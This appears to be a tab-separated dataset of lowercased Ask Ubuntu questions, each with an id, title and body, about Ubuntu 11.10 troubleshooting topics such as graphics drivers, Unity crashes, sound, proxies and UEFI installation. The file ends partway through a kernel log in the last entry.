69830	synchronization issue with windows 7 client	am having trouble synchronizing with the new client on windows 7 . i have added a folder from my user directory and waited for everything to sync , but all i have to show for it is a file structure populated with 0 byte size files . the root of the file structure does have some completed uploads . in all i have about 1.6 gb of files waiting to sync , and only 256 mb have come across .
69833	keyboard shortcut to switch focus between separate x screens ?	i 'm using xfce on a dual monitor setup , with xorg configured to separate x screens ( neither twinview nor cinerama is working on gf470 with latest nvidia drivers ) . i 'm not using xrandr . suppose i have firefox running on one screen ( :0.0 ) and thunderbird on the other ( :0.1 ) . when i want to switch focus from thunderbird to firefox , i need to move my mouse pointer to the firefox window and click ( alt-tab switches between windows on a single screen only ) . is there any keyboard shortcut for switching focus between screens ?
69835	is there a desktop client for tumblr ?	i 'm a heavy user of tumblr . is there an ubuntu desktop client that would let me see tumblr posts from my dashboard and tag which ones i 'm following ?
69838	no sound on my laptop	i have a panasonic toughbook cf-w8 with intel hda sound card , with a fresh install of ubuntu 11.10 , i can get sound out of headphones , but not from external speaker . would appreciate step by step help to solve problem . iam fairly new to linux . thank you
69839	gnome online accounts not syncing with gnome shell calendar	i 'm using gnome shell in ubuntu 11.10 . i 've recently activated online accounts , which is supposed to sync my google calendar with gnome shell 's calendar . however , it does never sync . i 've tried to reboot many times ; i 've even installed evolution , but it still does n't work . the google docs sync ( with gnome documents ) works fine , but neither the calendar , the mail ( it does n't sync with evolution ) or the contacts ( empathy ) are synced . so , what could i do to make it work ?
69844	why is unity so crazy slow ?	i updated to 11.10 this week and i 've been hitting my head against the wall ever since . i have a two year old lenovo x301 . it should n't be `` underpowered '' but unity grinds it to a halt . memory : 3.8 gib processor : intel® core™2 duo cpu u9400 @ 1.40ghz × 2 what gives ?
69852	is the current drag to launcher behaviour the new default or a bug ?	on natty , i could drag a file to an icon on the launcher to bring up the window ( e.g . : drag an image to the firefox icon and wait for its window to show and then drop the file on , say , mediafire or gmail window to upload ) . now it just does n't work anymore . i 've filed a bug about it but nobody answered . i 'm wondering if this is the new default behaviour ? if not , please try to reproduce the bug in your systems ( i 've confirmed it in two computers ) and mark the bug as affecting you , please .
69854	ca n't close chromium window	my desktop view is taken up completely by a frozen window from the chromium browser and i can not manage to close it , switch windows , bring up the launcher or minimize it . how can i resolve this without rebooting or losing my session ?
69857	please help restore my crashed launcher/compizconfig	i have just upgraded from 11.04 to 11.10 . everything worked fine at first , but at one point when i was editing some compizconfig settings ( just something basic like 'number of desktops ' ) , compizconfig crashed . then the whole launcher disappeared , along with most of the buttons in the top panel . the shutdown button , calendar , etc . all went , leaving just the tabs from file to help . also , windows now have the title and file , edit.. ( etc ) tabs on 2 separate lines , instead of the new format where hovering over the bar switches which one is visible . i have since been using ctrl+alt+t to open a terminal and open applications , shut down , etc , from there . i have typed in the command : unity -- reset which has some effect , but the terminal never reaches the end of the task . i 've also done apt-get update , which completed fine . can anyone help me restore the launcher and panel functions ? ? i am getting most frustrated by the fact that once i have opened firefox , i ca n't enter any other commands !
69860	trouble getting ubuntu 11.10 working on new mac mini	i have a mac mini ( mid 2011 ) - and while the live cd works great - once ubuntu is installed , it will either freeze during bootup - or as soon as the gui is almost all loaded up . ( the icons appear on the left , however the top bar is blank ) . i am using refit , and tried installing both the 32bit and 64bit version . i setup a / partition as well as a 6gb swap . i have been able to pinpoint this issue with the fact that i have a second monitor plugged in via the hdmi port . thank you !
69862	find out whether network connection is full or half duplex	how do i find out whether a network connection is full or half duplex ?
69865	how do i get my radeon x300 graphics card working ?	last week , i tried the new version of ubuntu , 11.10 and with my computer 's configuration , i have a lot of graphics bugs ... i think the issue is my graphics card , it is an old card ( radeon x300 ) . is it exist any driver for this card on ubuntu ? thank you for helping me .
69869	which package should i download to compile c++0x code	os is ubuntu 10.04 . i need to compile some c++ code with -std=c++0x flag . but compiling does n't work because i need 4.6.1 version . now , when i go to gnu 's ftp , i see two different packages : gcc-4.6.1 gcc-g++-4.6.1 knowing that i need to compile c++0x code , which one should i download , and how do i install it/them ? i already installed these libraries ( gmp , mpc and mpfr ) .
69876	use totem and image viewer dark theme as the main gnome 3 theme ?	i like totem and image viewer dark theme of adwaita as my main theme instead of the light one . anybody knows how to do that ?
69881	touchpad double-tap holding is not working	i used to be able to double-tap and hold on my touchpad to drag and drop things . since i upgraded to oneric ocelot it only works 10 % of the time . what program are they using to log the touchpad and how can i change it back . both people who upgraded and who installed it directly reported the same problem so it appears to be the fault of oneric .
69884	what does `` system-wide settings will be cleared '' mean ?	i 'm reinstalling ubuntu , and i see that there 's this `` upgrade '' option that lets me reinstall ubuntu while keeping files and software when possible , but says that `` system wide settings '' will be cleared . are the config files and folders in my home folder `` .something '' go away with this or only things like sources.list ? thanks .
69886	when i use the cog and go to shutdown all i lose is the menu	i would like to know the procedure of the gui shutdown from the cog . this is because i have one 11.10 that will shutdown from the cog and shutdown button but , i have another that if i use the cog and the shutdown button i only loose the side menu . the background stays and the computer will not shut off . i want to learn how the gui process for shutdown works so i can learn and compare the two . i have googled for two days with no success .
69887	how do i stop icons from blinking in conky ?	how i can stop blinking conky ? i make in my config all what i want - transparent , showing icons above conky , but i cant do nothing with blinking ! when i make double_buffer yes conky stop blinking , but i cant do nothing with icons that are under conky . i dont use conpiz and kde . i use openbox and conky 1.8.1 . how i can fix blinking ?
69888	how can i fix the slow performance of my marvell yukon 88e8052 ethernet controller when using the 11.10 default driver ?	i have a marvell yukon 88e8052 ethernet card which they support with an official driver called sk98lin . on both ubuntu 10.10 and 11.10 i get the following results on http : //speedtest.net when using sk98lin : 120 mbps down , 100 mbps up on 10.10 without sk98lin ( just using the ubuntu defaults ) i get better results : 150 mpbs down , 120 mbps up however , on 11.10 with the defaults i ca n't even load the speedtest.net website . everything is incredibly slow . the best results i get when using apt-get ( for example ) are in the 50 kbps range , and that 's after i 've tweaked my mtu and messed around with a bunch of settings like disabling ipv6 and setting up dns manually ( without the tweaks it 's more like 20 kbps ) . there are no dropped packets , it 's just super slow . this leads me to believe it 's a problem with the driver , though of course it might be something else . how can i fix this ? sk98lin is fine , but i 'd like to figure out what 's going on and hopefully be able to use 11.10 with the 10.10 speeds ; that 30 mbps boost over sk98lin is valuable when downloading large files !
69889	gnome-settings-daemon extensively reads/writes hard-disk	after upgrading to 11.10 , after each login the computer becomes slow and the hard-disk noisy ( sounds like reading/writing/defragmenting ) . when i `` stop '' the process gnome-settings-manager in the system monitor , everything is normal again and fast . i do n't believe that this endless read-write-loop is intended behavior . how do i proceed to solve this problem ?
69891	how to make indicator applet work on awn ?	unfortunately avant window navigator 's indicator applet does n't work in 11.10 . is there any workarounds ?
69895	upgrade from 11.04 to 11.10 - my user do not load	to developers and administration : ) i am developer so my work depends on os on which i work . as additional software i installed unity2d desktop from repository and openbox . a couple a days ago , when i was working on unity_2d , i got the upgrade proposal notification , so i agreed , and the update of my system begun . the update was successful , i turned on my notebook , then login , but after a couple of minutes borders on my windows disappear . even if i reload unity , they continue to disappear each time after a couple of minutes . a couple of days after ( i am not sure how many days exactly ) , i tried to login to my user - i enter password ( password is right ) - > black screen with codes for 2-3 seconds - > and i am again on login screen . i tried all desktops manager and `` ctrl alt f1 '' terminal : user login is possible only on terminal sessions , but it do not load visual desktop . 'guest ' user is working with any desktop , on `` root '' user i ca n't login because my password did n't work . i really like ubuntu and i understand that developers work a lot of time to bring us a new design and features in 11.10 distro , but after upgrade -- - all my system goes to hell , and my work too .
69896	ca n't run `` x -configure '' , `` server is already active '' error	in order to fix a problem with the setup of the screen brightness i try to create a xorg.conf this is done by the command x -configure right ? trying to run this command as root , i will get : fatal server error : server is already active for display 0 if this server is no longer running , remove /tmp/.x0-lock and start again . trying to run this command in recovery modus , i will get the same . after remove the mentioned file i get the error : can not create file /tmp/.x0-lock just to make sure : yep i have the rights as i am logged in as root .
69910	speaker volume always at zero in alsamixer in terminal	on every startup on ubuntu 11.10 , i have to open terminal and enter alsamixer to turn speaker volume up to get sound . is there a way to lock this in so i do n't have to keep opening the terminal .
69914	why is n't xbmc media center in ubuntu software center ?	i 've been a long-time user of xbmc ( and sometimes boxee , but it 's full of bugs.. ) , and i wondered : it 's open source , it 's a stable software , and yet it 's not in usc . why ?
69917	change/set working directory of scripts executed from file manager window	whenever i execute a script by clicking on it in a file manager window it gets run with my home directory as it 's working directory , not directory that has the script within it where i 'm clicking . this is a pain if the code needs to access files in the actual directory where the script is located . is there a way to change this behavior ? example : foo.py is located in the folder /home/phil/src/python foo.data is also located there and is read by foo.py during execution . if i open a terminal in that folder and run the script , it runs with /home/phil/src/python as it 's working directory and it successfully finds and opens foo.data however , if i open my file manager ( pcman in my case , lubuntu ) , navigate to /home/phil/src/python and double click foo.py to run it it will run with /home/phil as it 's working directory . it wo n't find foo.data and it will fail . after googling this a bit it seems this also happens with nautilus .
69919	how do i use plymouth on a server ?	i 'm trying to use plymouth with ubuntu server 11.10 but with no luck . i 've installed the server as minimal virtual machine on virtualbox . then i installed plymouth theme , but it does not show up . one of the theme i used only displayed a text during the boot . so if anyone get it working , i hope to know how !
69920	closing one window sends others to the background	after updating to 11.10 , if i have a few non-fullscreen windows on top of a fullscreen window , if i close one of the non-fullscreen windows , the other non-fullscreen windows are pushed behind the fullscreen window in the focus stack .
69921	add global menu / appmenu in xubuntu 11.10 64-bit ( like mac/unity ) ?	i 've been looking a lot for this , but i just ca n't get a global menu to get working on xubuntu 11.10 64-bit . the best solution i 've found is http : //www.omgubuntu.co.uk/2011/10/how-to-enable-ubuntus-global-menu-in-xubuntu-11-10/ but it does n't work : when i add the applet to the xfce panel , it seems to instantly crash . when i run xfce4-panel in the console , the last 3 lines look pretty relevant : /usr/lib/xfce4-indicator-plugin/xfce4/panel-plugins/xfce4-appmenu-plugin : error while loading shared libraries : libxfce4panel-1.0.so.3 : wrong elf class : elfclass64 xfce4-panel-message : plugin indicator-appmenu-29 has been automatically restarted after crash . /usr/lib/xfce4-indicator-plugin/xfce4/panel-plugins/xfce4-appmenu-plugin : error while loading shared libraries : libxfce4panel-1.0.so.3 : wrong elf class : elfclass64 this might indicate the plugin does not work on my 64bit os , but i could n't find a 64-bit alternative ... i would really appreciate if someone could help me a bit further with this . any way to get a global menu working will do ! i got used to it on my hackintosh , and now i ca n't live without it . : ) ps : although i stated [ xubuntu ] in the title , i actually run the default ubuntu , on top of which i installed xubuntu-desktop . i do n't really use unity anymore since it 's too buggy without hardware acceleration . thank you in advance for the assistance , any suggestion is appreciated .
69922	will gwibber get google+ support ?	will gwibber be getting google+ support ? i would like to post statuses from my desktop at anytime like facebook and twitter .
69925	help me understand sizing of encrypted home partition	i installed 11.10 on my laptop choosing to encrypt home directory . now , when i use disk usage analyzer i get this picture : total fs capacity is reported correctly as 40.1gb . however inside home directory i have mysterious feature of .ecryptfs which appears to have the same size as my home directory . what exactly does that mean ?
69929	ati radeon hd with catalyst driver stuck mirroring screens	in 11.10 i replaced my aging nvidia card with a new radeon hd 6970 card . the single card has two dvi output ports which i 've connected to two monitors . i installed catalyst version 11.9 and i can not get multiple monitors set up the way i want . i tried : $ sudo amdcccle and setting the mode to single desktop multiple monitors and whenever i do that unity crashes and i get back to the login screen . nothing shows up in the xorg . *.log files for me to post here . there 's only one card so i do n't think xinerama would be any help here . anyone have any ideas ? edit : here 's my xorg.conf file : section `` serverlayout '' identifier `` aticonfig layout '' screen 0 `` aticonfig-screen [ 0 ] -0 '' 0 0 endsection section `` module '' endsection section `` monitor '' identifier `` aticonfig-monitor [ 0 ] -0 '' option `` vendorname '' `` ati proprietary driver '' option `` modelname '' `` generic autodetecting monitor '' option `` dpms '' `` true '' endsection section `` monitor '' identifier `` 0-dfp3 '' option `` vendorname '' `` ati proprietary driver '' option `` modelname '' `` generic autodetecting monitor '' option `` dpms '' `` true '' option `` preferredmode '' `` 1280x1024 '' option `` targetrefresh '' `` 60 '' option `` position '' `` 0 0 '' option `` rotate '' `` normal '' option `` disable '' `` false '' endsection section `` monitor '' identifier `` 0-crt1 '' option `` vendorname '' `` ati proprietary driver '' option `` modelname '' `` generic autodetecting monitor '' option `` dpms '' `` true '' option `` preferredmode '' `` 1280x1024 '' option `` targetrefresh '' `` 75 '' option `` position '' `` 0 0 '' option `` rotate '' `` normal '' option `` disable '' `` false '' endsection section `` device '' identifier `` aticonfig-device [ 0 ] -0 '' driver `` fglrx '' option `` monitor-dfp3 '' `` 0-dfp3 '' option `` monitor-crt1 '' `` 0-crt1 '' busid `` pci:5:0:0 '' endsection section `` device '' identifier `` amdcccle-device [ 5 ] -1 '' driver `` fglrx '' option `` monitor-dfp3 '' `` 0-dfp3 '' busid `` pci:5:0:0 '' screen 1 endsection section `` screen '' identifier `` aticonfig-screen [ 0 ] -0 '' device `` aticonfig-device [ 0 ] -0 '' defaultdepth 24 subsection `` display '' endsubsection endsection section `` screen '' identifier `` amdcccle-screen [ 5 ] -1 '' device `` amdcccle-device [ 5 ] -1 '' defaultdepth 24 subsection `` display '' viewport 0 0 depth 24 endsubsection endsection
69930	no unity 3d option on the login screen	i upgraded my ubuntu to 11.10 on day one but the unity 3d is not there as an option . i have user defined , recovery mode and ubuntu 2d . i 've done this test /usr/lib/nux/unity_support_test -p and all results are green yes . here 's the result opengl vendor string : ati technologies inc. opengl renderer string : amd radeon hd 6700 series opengl version string : 4.1.11005 compatibility profile context not software rendered : yes not blacklisted : yes glx fbconfig : yes glx texture from pixmap : yes gl npot or rect textures : yes gl vertex program : yes gl fragment program : yes gl vertex buffer object : yes gl framebuffer object : yes gl version is 1.4+ : yes unity 3d supported : yes
69932	is there an sd card diagnostic utility ?	are there any sd card diagnostic utility programs out there for ubuntu ? i would like to run tests on my sd card to check capacity , write speed etc . i have one for windows but i am looking for a linux flavor and hope to find some source code .
69934	how do i answer a video call request in empathy ?	my friend sent me a video call request on his phone ( gtalk ) to myself ( using empathy ) . i heard a ringing noise and a notification of the call , but i have no way of answering the call ! i looked in the envelope indicator but there was nothing there .
69940	midori not starting up in fresh install	i 'm running a fresh install of ubuntu 11.10 running gnome shell , everything working as it should . i just installed midori from regular ubuntu repositories using synaptic package manager , but when l attempt to launch it , despite the appearance of the midori icon and the `` whirl '' in the top panel , the browser does not start . switching gui does not change the effect . as requested , starting midori from the terminal generates the following output : giulio @ giulio-laptop : ~ $ midori midori : symbol lookup error : midori : undefined symbol : webkit_web_view_get_selected_text
69942	how to use 'dh_installgsettings ' ?	my app use systay . i know i should use gsettings to set the 'systray-whitelist ' key . now i would like to package my app . after i googled , i guess dh_installgsettings can help me . so i put a file named 'myapp.gsettings-override ' and put the following content : com.canonical.unity.panel ] systay-whitelist= [ 'myapp ' ] am i right ? will 'myapp ' be appended to systray-whitelist ?
69945	missing panels in classic after upgrade to ocelot	i just completed an upgrade to ocelot from natty . i ca n't tolerate the unity interface , so i 'm attempting to run the classic shell . after selecting ubuntu classic session and logging in , i see no panels whatsoever . nautilus has loaded a file-menu bar where my top panel should instead be . right-clicking ( or alt+right click ) on this menu has no response , so i 'm unable to add new panels . i 've tried various things , such as purging and reinstalling gnome packages . i 've deleted user setting folders such as : ~/.gconf ~/.gnome ~/.gnome2 ~/.metacity these have had no effect . any suggestions ? thank you .
69952	gnome-shell does n't install due to held broken packages	when i install gnome-shell in ubuntu 11.10 , the following error appear gnome-shell : depends : gnome-icon-theme-full but it is not going to be installed e : unable to correct problems , you have held broken packages .
69953	missing panels in classic after upgrade	i just completed an upgrade to ocelot from natty . i ca n't tolerate the unity interface , so i 'm attempting to run the classic shell . i followed the instructions on this thread . however running the gnome-tweak-tool and disabling the `` filemanager handles desktop '' option yields only a blank screen . i still have no panels , only now i see neither the nautilus menubar nor the desktop icons . after selecting gnome classic session and logging in , i see no panels whatsoever . nautilus has loaded a file-menu bar where my top panel should instead be . right-clicking ( or alt+right click ) on this menu has no response , so i 'm unable to add new panels . i 've tried various things , such as purging and reinstalling gnome packages . i 've deleted user setting folders such as : ~/.gconf ~/.gnome ~/.gnome2 ~/.metacity these have had no effect . any suggestions ?
69955	different font rendering with other window manager	when i log into a session which uses the blackbox window manager the fonts look different ( read worse ) compared to how they are rendered in unity . does anyone know if it is possible to achieve the same font rendering with other window managers by setting the appropriate values in ~/.fonts.conf ? if the answer is yes what settings should i use - is there a way to retrieve the current settings that affect font rendering ? i use ubuntu 11.10 by the way .
69956	how big the root partition should be ?	when i 'm repartitioning my hard disk , how big should the root partition be for flawless functioning ? even after 6-8 months after installing ( v. 10.10 ) , system files on the root partition occupy just 5.7 gb .
69957	script to swap two files	one thing that always drove me crazy is the need to do mv file1 tmp mv file2 file1 mv tmp file2 in oder to swap 2 filenames . what do you guys use to swap 2 files ? are there any standard script for swaping ? something like sw file1 file2 would be nice
69959	two battery icons after installing `` jupiter '' applet , but only in one account	i have three accounts set up on my netbook , and the jupiter applet installed to help with battery life . however , on my main account ( my account ) the jupiter applet has a battery indicator next to it , as well as the regular battery icon next to the mail icon . there is another `` administrator '' account on the netbook , yet that account does n't have the extra battery icon . any idea why or how to fix it ?
69961	unity freezes for periods of time	i am using ubuntu 11.10 with unity . whenever i try to minimize or maximize any application window the ui gets struck for around 45 secs . how do i overcome this other than removing unity ? i get this after configuring wallpaper plugin in ccsm . update : laptop model : hp dv6 graphics card : nvidia corporation g86 [ geforce 8400m gs ]
69962	keyboard lag when starting gvim	after i upgraded to 11.10 , i 've had a weird problem with gvim . every time i start gvim , all my keyboard input to gvim is delayed by several seconds . this problem usually goes away after attempting to use gvim for a while , but then appears again on new windows . i 'm running the gnome-classic desktop with ibus .
69965	how to change port number in vino ?	how to change port number in vino ubuntu 11.10 ? can not find option to change from port 5900 on vino vnc 'remote desktop ' window , nor can i find it via gconf-editor as was available in previous ubuntu version . please help
69966	多qt ? skype and qbittorrent ( and all qt apps like vlc ) crashes my unity 3d session and	first ... sorry for my english ... i have this problem : just after installing skype and/or qbittorrent , when i run it , my unity 3d session crashes ( with an ugly screen effect ) and get back to gdm in order to login again . i do n't know why it happens in my clean installation of ubuntu 11.10 . in natty both worked fine . probably you need more info about my pc . from natty to oneiric i only got problems changing nouveau drivers for propietary nvidia drivers ( finally i got it works fine -i suppose it- ) . update : i have confirm in my pc that maybe it is a problem with qt : vlc also crashes my desktop . i would like skype and qbittorrent work again ( and vlc ) . thank you very much for your help . best regards installing all libqt4-* does'nt solve the problem : (
69973	ca n't install gnome due to an unmet dependency on gnome-core	i upgraded to ubuntu 11.10 , then found that when i try to download the gnome desktop environment from the software centre , i get the following message : package dependencies can not be resolved . the following packages have unmet dependencies : gnome depends : gnome-core ( =1:30+1ubuntu1 ) but 1:30+1ubuntu1 is to be installed . i 'm not offered the gnome option when i right-click on the password screen . i 've tried the following commands , all gathered from the web : sudo apt-get install gnome-session-fallback restart ; sudo apt-get install gnome-themes-standard ; sudo apt-get install gnome panel . none has had the result of allowing me to get and use the gnome desktop . i 'm a user , not a developer , and i only upgraded to 11.10 because i thought i would have that option . what can i do ?
69977	error when updating ubuntu server to new version	today i updated ubuntu server 11.04 to 11.10 and after a rather fast update i got the following error : processing triggers for initramfs-tools ... update-initramfs : generating /boot/initrd.img-3.0.0-12-server gzip : stdout : no space left on device e : mkinitramfs failure cpio 141 gzip 1 update-initramfs : failed for /boot/initrd.img-3.0.0-12-server with 1. dpkg : error processing initramfs-tools ( -- configure ) : subprocess installed post-installation script returned error exit status 1 no apport report written because maxreports is reached already errors were encountered while processing : initramfs-tools e : sub-process /usr/bin/dpkg returned an error code ( 1 ) a package failed to install . trying to recover : setting up initramfs-tools ( 0.99ubuntu7 ) ... update-initramfs : deferring update ( trigger activated ) processing triggers for initramfs-tools ... update-initramfs : generating /boot/initrd.img-3.0.0-12-server gzip : stdout : no space left on device cpio : write error : broken pipe e : mkinitramfs failure cpio 1 gzip 1 update-initramfs : failed for /boot/initrd.img-3.0.0-12-server with 1. dpkg : error processing initramfs-tools ( -- configure ) : subprocess installed post-installation script returned error exit status 1 errors were encountered while processing : initramfs-tools need to add that i can connect normally to the server via ssh . it reboots well with no problems and i can install and do anything but this error appears when i install/remove anything . it was the only error when updating i even updated via ssh with no other problems .
69980	disproportional horizontal mouse speed with two monitors	i 'm using a laptop touchpad . moving my finger from top to bottom of the pad , i can move the mouse pointer across the complete height of the screen . moving my finger from left to right of the pad , i can move the mouse pointer across the complete width of the screen . when i plug in a second monitor , the horizontal mouse speed suddenly doubles . now i can move the pointer all the way across two monitors in a single swipe , but the vertical speed of the pointer has not changed . this feels weird . is there a way to keep the mapping of the pointer on the screen proportional to the aspect ratio of the touchpad ? ideally , something i wo n't need to tweak every time i plug in or disconnect an external monitor ?
69982	mounting an encrypted partition ( not home ) at login	i have a partition for data that is encrypted . i 've created it using disk utility , so i suppose it 's using ecryptfs . since it is not home , it does n't get automatically configured to be mounted at login . i need it to be mounted on login ( not boot ) . i suppose one can make gnome to run a little script on login that mounts it , but all methods i have found on the net need root privileges . i have my home dir encrypted and it does n't require me to enter a passphrase ( i guess it uses my login password ) . i would like a similar solution for the data partition . there should be a way , since home automatically mounts , but there is n't and it needs me to enter a pass , it would be less convenient but would also work . any ideas ? i 'm using ubuntu oneiric 64bit . thanks ! !
69983	proxy settings not working	i just installed ubuntu 11.10 with wubi and i am currently on a campus that requires the usage of a proxy server . i went into system settings/network/proxy settings . did n't work . i manually set the proxy in firefox and i do have access to the internet ; however , i can not add apps or update ubuntu . how can i fix it ? thanks
69984	brightness issues on a dell inspiron n7010	i have installed ubuntu 11.10 64-bit on my dell inspiron n7010 . when i 'm away , the screen locks itself out and the screen goes black . however , when i move the mouse or press any keys it does n't come back up or show me the lock screen dialog that should appears ... it stays black . once i type in my password and then press enter , it logs in but still remains black and i have to increase brightness to see my screen every time . this happens every time the screen locks when i 'm away .
69998	minecraft crashes when creating a new game	so , just upgraded to oneiric and i find there are quite a lot of bugs ... one of them is when i try to launch minecraft and create a new game , it crashes . i get this error code .
70000	when does you plan to add pim sync to ubuntu one	i think that syncing the pim 's around my ubuntu landscape is a missing feature . all kinds of calendar software like evolution , kontact or thunderbird ( with lightning ) are able to sync . it is only a small step to finish this issue , i think . it is possible to stream music with ubuntu one , but no sync with local calendars or mobiles . i think that the pim syncing feature is more important an useful as the music streaming one . i only get an account on ubuntu one for pim syncing and mobile sync option . right now ubuntu one closed this feature . for what really i should keep this ? for music streaming ? i can use ubuntu one as a backup system for my ubuntu files ?
70002	software center does not load after upgrade and terminal does not allow me to enter password	i upgraded to ubuntu 11.10 and now software center does not work and when i open dash it can not access any applications . when i tried some of the solutions posted the terminal asks me the sudo password for but does take any input from the keyboard . how can i enter my password or solve these problems ?
70005	how to run an executable bash script on kubuntu ?	i have recently changed my os from ubuntu 11.04 to kubuntu 10.04 but do n't know how to get my executable bash scripts to run on kubuntu . on ubuntu all i did was click on the text file and i was given the options to run , run in terminal , display etc . but when i click on the file in kate on kubuntu these options do n't appear . permissions on the file are set to executable , but how do i get the script to actually execute ? typical contents of the files are # ! /bin/bash 's/^\ ( .\ { 4\ } \ ) \ ( .\ { 2\ } \ ) /\1 , \2 , /g ' ~/documents/dataonly/ad70000 $ .txt > ~/documents/octave/auscad exit
70009	maximize , minimize and close buttons are not visible with adwaita theme	i have upgraded to oneiric from natty . i am facing a problem in using the adwaita theme . i have set the default window and gtk2 theme to be adwaita . however , when the windows are maximized , the close , minimize and the maximize buttons are not viewable against the black top panel . the color of the top panel is still black . the buttons however can be viewed if i have the application windows minimized . any help in resolving this issue will be appreciated .
70010	troubles when trying to play a dvd	i 'm trying to play a dvd i recently bought , but when i try to , sometimes a message appears : could not read dvd . this may be because the dvd is encrypted and a dvd decryption library is not installed . however i 've cheked the ubuntu documentation and installed the libdvdread4 libdvdnav4 gstreamerx.xx-plugins-ugly and bad .
70012	sublime text 2 does n't stay pinned to the launcher	i use sublime text 2 in ubuntu . the program downloads and runs on it 's own without an installer ( sort of like a portable app , i guess ) . when i pin it to the launcher , it only stays until i restart the computer . then i have to dig it up again and repin it . this was n't an issue in 11.04 .
70019	how do i install the hughes net status meter ?	i 'm trying to install hughes net status meter on ubuntu 11.04 . i need a proper installation method . i have already managed to get adobeairinstaller.bin downloaded and installed adobe air . i have downloaded the hughesnet status meter , saved it to the default folder `` documents '' , and clicked to install . the installation screen comes up momentarily but then disappears without finishing the installation . i installed it before using a tip that i found using google search but i dont recall the site or link where i found it . i cant seem to find it again after multiple searches . please help .
70023	usb card reader	i am using a gear head usb card reader on ubuntu 11.1 and it works great . the model number of the device is cr3000msd . i am looking for some working source code in any language really that will allow me to access the device at the hardware level . in other words c++ library , open source driver etc ? i know there must be source code since the device is working perfectly on ubuntu 11.1 . the reason i started using ubuntu is so i can pick a part code for these types of devices . does anyone know where i can find some working code for this device ? thanks !
70025	how do i install on an uefi asus 1215b netbook ?	i 'm trying to install ubuntu 11.10 on a uefi netbook asus 1215b using an usb stick . i created a fat32 efi partition of 100mb , 2gb swap , and 2 ext4 partitions ( for root ( / ) and /home , respectively ) . while installing , ubuntu switches to cli and starts running efibootmgr . after a few commands ( sadly i do n't have a screen grab ) , it stops displaying text but it 's still running judging by the hdd led . then , there 's a weird graphic glitch and the screen turns off ( hdd led still indicating activity ) . finally , it just stops , but does n't turn off . not even a hard reboot works ( holding down the power button a few secs ) . i have to plug the netbook off and remove the battery . after that , it still does n't boot ubuntu ... anyway , what can i do ? i 'm considering following the footsteps here and here . edit : here is the syslog $ oct 21 01:05:17 ubuntu kernel : [ 1220.544009 ] bug : unable to handle kernel paging request at 00000000ffe1867c $ oct 21 01:05:17 ubuntu kernel : [ 1220.544009 ] ip : [ < ffff880066d44c1f > ] 0xffff880066d44c1e $ oct 21 01:05:17 ubuntu kernel : [ 1220.544009 ] pgd 14ecc067 pud 0 $ oct 21 01:05:17 ubuntu kernel : [ 1220.544009 ] oops : 0000 [ # 1 ] smp $ oct 21 01:05:17 ubuntu kernel : [ 1220.544009 ] cpu 0 $ oct 21 01:05:17 ubuntu kernel : [ 1220.544009 ] modules linked in : cryptd aes_x86_64 ufs qnx4 hfsplus hfs minix ntfs msdos xfs reiserfs jfs bnep parport_pc rfcomm dm_crypt ppdev bluetooth lp parport joydev eeepc_wmi asus_wmi sparse_keymap uvcvideo videodev v4l2_compat_ioctl32 snd_hda_codec_realtek snd_seq_midi snd_hda_codec_hdmi snd_hda_intel snd_hda_codec arc4 snd_rawmidi snd_hwdep psmouse snd_pcm snd_seq_midi_event ath9k serio_raw sp5100_tco i2c_piix4 k10temp snd_seq mac80211 snd_timer ath9k_common ath9k_hw snd_seq_device ath snd cfg80211 soundcore snd_page_alloc binfmt_misc squashfs overlayfs nls_iso8859_1 nls_cp437 vfat fat dm_raid45 xor dm_mirror dm_region_hash dm_log btrfs zlib_deflate libcrc32c usb_storage uas radeon video ahci libahci ttm drm_kms_helper drm wmi i2c_algo_bit atl1c $ oct 21 01:05:17 ubuntu kernel : [ 1220.544009 ] $ oct 21 01:05:17 ubuntu kernel : [ 1220.544009 ] pid : 28432 , comm : efibootmgr not tainted 3.0.0-12-generic # 20-ubuntu asustek computer inc. 1215b/1215b $ oct 21 01:05:17 ubuntu kernel : [ 1220.544009 ] rip : 0010 : [ < ffff880066d44c1f > ] [ < ffff880066d44c1f > ] 0xffff880066d44c1e $ oct 21 01:05:17 ubuntu kernel : [ 1220.544009 ] rsp : 0018 : ffff88005e2cbab0 eflags : 00010082 $ oct 21 01:05:17 ubuntu kernel : [ 1220.544009 ] rax : 00000000ffe1867c rbx : 0000000000000009 rcx : 00000000ffe1867c $ oct 21 01:05:17 ubuntu kernel : [ 1220.544009 ] rdx : 0000000000000000 rsi : ffff88005e2cbbea rdi : ffff88005e2cbb40 $ oct 21 01:05:17 ubuntu kernel : [ 1220.544009 ] rbp : 00000000ffe1867c r08 : 0000000000000000 r09 : 0000000000000084 $ oct 21 01:05:17 ubuntu kernel : [ 1220.544009 ] r10 : ffffc9001101ff83 r11 : ffffc90011018685 r12 : 0000000000000001 $ oct 21 01:05:17 ubuntu kernel : [ 1220.544009 ] r13 : 0000000000000000 r14 : ffffc9001101867c r15 : ffff88005e2cbbe1 $ oct 21 01:05:17 ubuntu kernel : [ 1220.544009 ] fs : 00007f9cdde13720 ( 0000 ) gs : ffff880066a00000 ( 0000 ) knlgs:0000000000000000 $ oct 21 01:05:17 ubuntu kernel : [ 1220.544009 ] cs : 0010 ds : 0000 es : 0000 cr0 : 0000000080050033 $ oct 21 01:05:17 ubuntu kernel : [ 1220.544009 ] cr2 : 00000000ffe1867c cr3 : 000000002dace000 cr4 : 00000000000006f0 $ oct 21 01:05:17 ubuntu kernel : [ 1220.544009 ] dr0 : 0000000000000000 dr1 : 0000000000000000 dr2 : 0000000000000000 $ oct 21 01:05:17 ubuntu kernel : [ 1220.544009 ] dr3 : 0000000000000000 dr6 : 00000000ffff0ff0 dr7 : 0000000000000400 $ oct 21 01:05:17 ubuntu kernel : [ 1220.544009 ] process efibootmgr ( pid : 28432 , threadinfo ffff88005e2ca000 , task ffff880014f0dc80 ) $ oct 21 01:05:17 ubuntu kernel : [ 1220.544009 ] stack : $ oct 21 01:05:17 ubuntu kernel : [ 1220.544009 ] ffffc90011010000 ffff88005e2cbac8 0000000000010000 ffff880066d4401d $ oct 21 01:05:17 ubuntu kernel : [ 1220.544009 ] 000000000000007c ffff880009e84400 0000000000000090 ffff880066d45738 $ oct 21 01:05:17 ubuntu kernel : [ 1220.544009 ] ffffc9001101867c ffff880066d4331c 0000000000000009 ffffc9001101867b $ oct 21 01:05:17 ubuntu kernel : [ 1220.544009 ] call trace : $ oct 21 01:05:17 ubuntu kernel : [ 1220.544009 ] [ < ffffffff815e9efe > ] ? _raw_spin_lock+0xe/0x20 $ oct 21 01:05:17 ubuntu kernel : [ 1220.544009 ] [ < ffffffff811d9c2d > ] ? open+0x10d/0x1b0 $ oct 21 01:05:17 ubuntu kernel : [ 